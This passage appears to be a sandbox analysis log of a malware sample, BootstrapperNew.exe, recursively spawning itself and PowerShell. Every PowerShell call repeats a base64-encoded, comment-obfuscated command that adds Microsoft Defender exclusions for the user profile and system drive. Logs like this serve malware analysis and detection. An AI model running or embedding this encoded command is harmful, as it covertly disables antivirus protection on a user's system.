        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        166⤵
        
        PID:7240
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        166⤵
        
        PID:7708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        167⤵
        
        PID:2184
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        167⤵
        
        PID:7516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        168⤵
        
        PID:7252
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        168⤵
        
        PID:6832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        169⤵
        
        PID:7328
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        169⤵
        Checks computer location settings
        
        PID:7608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        170⤵
        
        PID:7392
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        170⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        171⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        171⤵
        Checks computer location settings
        
        PID:7756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        172⤵
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        172⤵
        Checks computer location settings
        Drops file in Windows directory
        
        PID:5968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        173⤵
        
        PID:4004
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        174⤵
        Suspicious use of SetWindowsHookEx
        
        PID:8124
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        173⤵
        
        PID:6036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        174⤵
        
        PID:5388
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        174⤵
        
        PID:3060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        175⤵
        
        PID:6764
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        175⤵
        Checks computer location settings
        
        PID:8152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        176⤵
        
        PID:6356
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        176⤵
        Checks computer location settings
        Drops file in Windows directory
        
        PID:548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        177⤵
        
        PID:6704
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        177⤵
        
        PID:7408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        178⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        178⤵
        
        PID:5180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        179⤵
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        179⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        180⤵
        
        PID:7788
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        180⤵
        
        PID:7996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        181⤵
        
        PID:1628
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        181⤵
        Checks computer location settings
        
        PID:6932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        182⤵
        
        PID:4468
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        182⤵
        Drops file in Windows directory
        
        PID:2236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        183⤵
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        183⤵
        Checks computer location settings
        
        PID:5228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        184⤵
        
        PID:6472
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        184⤵
        
        PID:916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        185⤵
        System Location Discovery: System Language Discovery
        
        PID:6484
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        185⤵
        
        PID:6544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        186⤵
        
        PID:864
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        186⤵
        System Location Discovery: System Language Discovery
        
        PID:7340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        187⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        187⤵
        
        PID:5436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        188⤵
        
        PID:4100
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        188⤵
        System Location Discovery: System Language Discovery
        
        PID:4704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        189⤵
        
        PID:5288
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        189⤵
        
        PID:5376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        190⤵
        
        PID:6784
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        190⤵
        
        PID:6052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        191⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        191⤵
        Checks computer location settings
        
        PID:3112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        192⤵
        System Location Discovery: System Language Discovery
        
        PID:7032
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        192⤵
        
        PID:6468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        193⤵
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        193⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        194⤵
        
        PID:7476
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        194⤵
        
        PID:5280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        195⤵
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        195⤵
        
        PID:6640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        196⤵
        
        PID:8040
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        196⤵
        
        PID:6116
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        197⤵
        
        PID:3308
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        197⤵
        
        PID:7212
        
